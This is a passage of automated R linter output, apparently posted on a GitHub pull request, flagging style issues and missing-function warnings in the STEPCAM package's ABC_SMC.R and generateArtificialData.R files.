flush.console();\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:118:7:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L118) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n      ^\n```\n[R/ABC_SMC.R:118:10:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L118) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:118:23:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L118) *style:* **Commas should always have a space after.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                      ^\n```\n[R/ABC_SMC.R:118:29:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L118) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:139:5:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L139) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:140:28:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L140) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:140:28:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L140) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:148:12:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L148) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted <= numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:148:30:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L148) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted <= numParticles) {\n                             ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:19:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:19:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L152) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:154:19:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L154) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L156) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:166:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L166) *style:* **Trailing whitespace is superfluous.**\n```r\n​     \n^~~~~\n```\n[R/ABC_SMC.R:170:40:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L170) *style:* **Commas should always have a space after.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],row.names=c(1:taxa));\n                                       ^\n```\n[R/ABC_SMC.R:170:53:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L170) *style:* **Put spaces around all infix operators.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],row.names=c(1:taxa));\n                                                   ~^~\n```\n[R/ABC_SMC.R:170:59:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L170) *style:* **Commas should always have a space after.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],row.names=c(1:taxa));\n                                                          ^\n```\n[R/ABC_SMC.R:170:68:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L170) *style:* **Put spaces around all infix operators.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],row.names=c(1:taxa));\n                                                                  ~^~\n```\n[R/ABC_SMC.R:173:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L173) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:174:8:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L174) *style:* **Commented code should be removed.**\n```r\n​     # source(\"/Users/janzen/GitHub/STEPCAM/R/modified_dbFD.R\")\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:175:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L175) *style:* **lines should not be more than 80 characters.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, m = res[[1]], nb.sp = res[[2]]) \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:175:20:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L175) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, m = res[[1]], nb.sp = res[[2]]) \n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:175:20:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L175) *warning:* **no visible global function definition for ‘strippedDbFd’**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, m = res[[1]], nb.sp = res[[2]]) \n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:175:82:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L175) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, m = res[[1]], nb.sp = res[[2]]) \n                                                                                 ^\n```\n[R/ABC_SMC.R:176:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L176) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:177:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L177) *style:* **lines should not be more than 80 characters.**\n```r\n​      FRic <- FD_output$FRic # FRic = functional richness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:178:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L178) *style:* **lines should not be more than 80 characters.**\n```r\n​      FEve <- FD_output$FEve # FEve = functional evenness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:179:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L179) *style:* **lines should not be more than 80 characters.**\n```r\n​      FDiv <- FD_output$FDiv # FDiv = functional diversity (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:188:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L188) *style:* **lines should not be more than 80 characters.**\n```r\n​      # calculate distance of trait mean simulated community from that of observed\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:191:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L191) *style:* **lines should not be more than 80 characters.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean values of\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:193:14:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L193) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]],\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:195:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L195) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:198:19:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L198) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_disp[numberAccepted] <- params[1]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:199:19:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L199) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_filt[numberAccepted] <- params[2]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:200:19:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L200) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_comp[numberAccepted] <- params[3]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:202:14:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L202) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:203:18:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L203) *style:* **Variable and function names should be all lowercase.**\n```r\n​        rich_vec[numberAccepted] <- FRic[[1]]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:204:17:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L204) *style:* **Variable and function names should be all lowercase.**\n```r\n​        eve_vec[numberAccepted] <- FEve[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:17:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L205) *style:* **Variable and function names should be all lowercase.**\n```r\n​        div_vec[numberAccepted] <- FDiv[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:206:17:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L206) *style:* **Variable and function names should be all lowercase.**\n```r\n​        opt_vec[numberAccepted] <- mean_optimum;\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:24:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] = 1\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:40:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L209) *style:* **Use <-, not =, for assignment.**\n```r\n​          next_weights[numberAccepted] = 1\n                                       ^\n```\n[R/ABC_SMC.R:211:24:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] =\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:211:40:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L211) *style:* **Use <-, not =, for assignment.**\n```r\n​          next_weights[numberAccepted] =\n                                       ^\n```\n[R/ABC_SMC.R:212:13:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, disp_vals, filt_vals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:9:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:27:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:13:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L216) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:216:14:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:34:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:222:21:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L222) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                   ~^~\n```\n[R/ABC_SMC.R:222:22:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L222) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:224:13:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:224:38:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:242:54:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L242) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:245:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L245) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\" \", mean(disp_vals), mean(filt_vals), mean(comp_vals), \"\\t\", \"accept rate = \",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:246:9:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L246) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), \"\\n\")\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:246:32:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L246) *style:* **Put spaces around all infix operators.**\n```r\n​        numberAccepted / (tried-1), \"\\n\")\n                              ~^~\n```\n[R/ABC_SMC.R:249:27:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L249) *style:* **Commas should always have a space after.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^\n```\n[R/ABC_SMC.R:249:27:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L249) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:250:20:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L250) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_disp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:251:20:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L251) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_filt <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:252:20:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_comp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:262:61:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L262) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:266:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/ABC_SMC.R#L266) *style:* **lines should not be more than 80 characters.**\n```r\n​           \"Can't stop at iteration 1 - please set stop_at_iteration to 2 if you only want to generate from the prior\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:4:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L4) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:9:23:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:11:21:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:11:47:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:11:49:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L11) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:11:64:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:12:50:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:12:58:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:37:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:13:54:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n^\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:16:12:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L16) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:22:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:19:14:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:19:25:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L19) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:12:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 